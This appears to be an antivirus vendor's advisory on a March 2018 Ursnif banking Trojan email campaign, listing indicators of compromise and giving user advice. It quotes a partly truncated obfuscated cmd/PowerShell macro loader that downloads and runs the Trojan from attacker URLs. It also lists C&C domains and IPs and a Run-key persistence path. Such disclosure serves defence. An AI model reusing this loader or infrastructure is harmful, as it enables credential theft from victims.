TG Soft's C.R.A.M. (Anti-Malware Research Center analyzed an email campaign spreading the Ursnif malware Trojan Banker sent on March 20, 2018
Cyber-criminals developed "Social engineering" methods for fraudulent mass mailings, to induce the victim to open infected attachments or click on links in the body of the message.
If you received a suspicious email, send it to C.R.A.M. (Center for Anti-Malware Research): How to send suspicious emails
|
INDEX
|
"Ursnif" malware campaign.
Malware family:
Ursnif
VirIT: Trojan.Win32.Ursnif.ET, Trojan.DOC.Dropper.OV, W97M.Downloader.DU
Description:
The email was detected in the morning of March 20, 2018.
|
Subject: [changes based on the email you receive]
|
Vedi allegato e di confermare.
(Good morning |
See attachment and to confirm)
How it spreads:
It exploits e-mail accounts configured in the infected pc, sending fake infected replies to messages ALREADY RECEIVED by the victim.
The body of the message is always the same (visible above in red), while the subject is different because it answers to messages received by the victim and therefore varies according to them.
Attached is a DOC file with the name "Request.DOC" or that ends with "-Request.Doc" (example "info-Request.doc").
The malicious attachment in the email is a DOC file that contains an AutoOpen MACRO which, as soon as it is started, downloads the malware and runs it.
The AutoOpen macro first executes the CMD.EXE file, by passing it the following string as a parameter to run PowerShell (2018-03-20 campaign):
bjqVWvLV QnTWflfVsJojREFKUjiw nkCtiAvGwuozow & %^C^o^m^S^p^E^c^%
%^C^o^m^S^p^E^c^% /V /c
set %AjpWflGjmopTHFW%=uWfXwUcHhFpDf&&set %ZjoTtBfulCziS%=p&&
set %nzIdmRsRVXh%=o^w&&set %uwlNdsjVYvaRElO%=mjZqKjiZbNfEh&&
set %swXbCoHjVVRkJQ%=!%ZjoTtBfulCziS%!&&
set %pZvDDsqEGdMmWVb%=GtjNSvW&&set %YwzRKUfadQV%=e^r&&
set %hCfcSRbVDET%=!%nzIdmRsRVXh%!&&set %pfkWvEm%=s&&
set %QMUOTLlQNinjWiN%=tYkjGMD&&set %OuRzmiCNwI%=he&&
set %RlNcjvTsc%=ll&&!%swXbCoHjVVRkJQ%!!%hCfcSRbVDET%!!
%YwzRKUfadQV%!!%pfkWvEm%!!%OuRzmiCNwI%!!%RlNcjvTsc%!
"InVOke-exPressiOn(([RUNTimE.inTeroPsERvICEs.MarShAl]::
([runTime.intErOpseRvIceS.mArshal].GeTMembeRS()[4].NAMe).invoKE
[..]
ADUAZQA0ADMAOAAwADEAOAAwADUANQBiAGEANwA5ADYAZgBjAGEANAA4AGEAZQA
5ADIAYQBhADUAMQBkAGEAZgA5ADMAZABmADIANwBmAA=='|
conVerTto-SECURestriNG -keY (22..37)) ) ))) |
The cmd.exe runs a Powershell script:
powershell "InVOke-exPressiOn(([RUNTimE.inTeroPsERvICEs.MarShAl]::([ runTime.intErOpseRvIceS.mArshal].GeTMembeRS()[4].NAMe).invoKE( [rUNTiMe.InTeropservicES.MArShal]:: [..]
The PowerShell script download the Ursnif from the site
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter1.class in the folder C:\Users\Public\<numeri>.exe (example C:\Users\Public\241520.exe).
The malware is executed to copy itself to a random subdirectory of %USERPROFILE%\APPDATA\ROAMING\MICROSOFTAnd put in automatic execution, create a key in:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[valore casuale] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[CARTELLA CASUALE]\NOMEFILE.EXE.
Ursnif malware makes an injection into the process EXPLORER.EXE
Example:
Name: BITSTLIB.EXE
MD5: 3A20CFEFA9EF2EEB8E0BC48F2016587F3
Size: 772.608 byte
Compilation date: 15/01/2015 00.58.27
A second macro variant instead, downloads the Trojan Banker Ursnif from the site http://dqwodnqwdoajndwqdqwdasd[.]com.
Note:
The malware downloaded is part of the Ursnif family and its peculiarities are to steal access passwords to important sites such as may be home banking, mail, ftp etc.
IOC 2018-03-20 (aggiornamento ore 15:50):
File DOC MD5:
022237484700FED95B425E47C8E65894
28854137C4FA3FF73C36F867F759AB1E
37408744E477E08D9EC4C10F8A9671BD
43C103C0DF16656972E80993172D82D3
445C2BBB192009359B549435AFAF72BA
4491A44BAA33CB8D102A7704D469C79C
4ED22727791E7A7593F6091D54F0B6AB
683C235F7D1CBF548F863B84DC0C67E9
6F784EEDE13B9FDA61DF3E461DACE867
72E69B0BBD5FB4D0D83A7FE4FE8F1234
7B10F167C070654C5D62C501F805CEB2
8B330F4F54CE6B4272C6AEA681D84D1E
A51F64C001A2AA500C9AA174FBB3DEF4
B4B4EEF90D29EEB9CCB14BEF0041ABCD
BBA69D7143B32A4F28D8E55240068009
BD73D4E8BC206E7FA68C658264F82629
C606FC84BF6869ABD31727D9C4B8F299
E0E6AD82EA08C023CE88CD3B4E34141A
EB28EB488F842DAD6F6B96142367F709
File EXE MD5:
14AA6A6F472C9BDA6D7A863CB8ADF842
2DB06886393216B0774BE6757AE1B431
3A20CFEFA9EF2EEB8E0BC48F2016587F
B9E96DC35FBAC25E2A5B958401B09088
URL:
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter1.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter2.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter3.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter4.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter5.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter6.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter7.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter8.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter9.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter10.class
IP: 107.152.196.147
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter1.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter2.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter3.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter4.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter5.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter6.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter7.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter8.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter9.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter10.class
IP: 107.152.196.147
http://horse-technology[.]com/files/alex.bmp
http://lnx.eridanoweb[.]com/gestioni/header.png
http://playmuseek[.]com/wp-admin/maint/admin.rar
http://fioritononi[.]it/modules/readme.doc
http://voloweb[.]net/assistenze/img/wp-32.png
http://cmxsrl[.]it/wp-32.zip
http://onliva[.]at/jvassets/rk/docs.zip
Server C&C (dove vengono inviati i dati esfiltrati come password e clipboard log):
https://ijguiqjwhnschbashiwbad[.]net
https://xcnbjasjwehqiuzxc[.]com
http://onliva[.]at
http://fortares[.]su
http://swoqup[.]at
IP server C&C:
47.74.247.229
How to identify a fake email
Experience and common sense are the first weapons to avoid these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of
ZIP-formatted attachments and, if possible, DO NOT enable automatic
macro execution. It is strongly discouraged to set up automatic execution of macros since simply opening
Word and
Excel files will see the immediate execution of macros without any prior alert.
In case you have been infected by a
Banker, the advice from TG Soft's C.R.A.M. is to take appropriate security precautions
even after the remediation of the system(s) involved such as changing the most commonly used passwords on the Web. In case the workstation involved is used for home-banking transactions, an assessment with your
credit institution is also recommended..
How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts
Sending materials to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
- Any suspect email can be sent directly by the recipient's e-mail, to the following mail lite@virit.com,choosing as sending mode "Forward as Attachment" and inserting in the subject section "Possible phishing page to verify" rather than "Possible Malware to verify";
- Save the e-mail to be sent to the TG Soft's C.R.A.M. for analysis as an external file to the e-mail program used. The resulting file must be sent by uploading it from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). Obviously if you want a feedback on the analysis of the data submitted, you have to indicate an e-mail address and a brief description of the reason for the submission (for example: possiible / probable phishing; possible / probable malware or other).
We give you these suggestions to help avoiding credential theft, viruses/malware or even worse next-generation Ransomware / Crypto-Malware.
Integrate your PC / SERVER protection with Vir.IT eXplorer Lite
If you are not yet using Vir.IT eXplorer PRO, it is advisable to install, Vir.IT eXplorer Lite -FREE Edition-.to supplement the antivirus in use to increase the security of your computers, PC and SERVER indifferently,
Vir.IT eXplorer Lite has the following special features: |
 |
- freely usable in both private and corporate environments with Engine+Signature updates without time limitation;
- Interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend to use it as a supplement to the AntiVirus already in use as it does not conflict or slow down the system but allows to significantly increase security in terms of identification and remediation of infected files;
- It identifies and, in many cases, even removes most of the viruses/malware actually circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.It eXplorer PRO;
- Through Intrusion Detection technology, also made available in the Lite version of Vir.IT eXplorer, the software is able to report any new-generation viruses/malware that have set in automatically and send the reported files to TG Soft's C.R.A.M.
- Proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.
For Vir.IT eXplorer PRO users...
 |
For Vir.IT eXplorer PRO owners, it is also possible to contact for free TG Soft's technical phone support.The details can be found on the support page CLIENTSI. |
C.R.A.M.
TG Soft's Anti-Malware Research Center
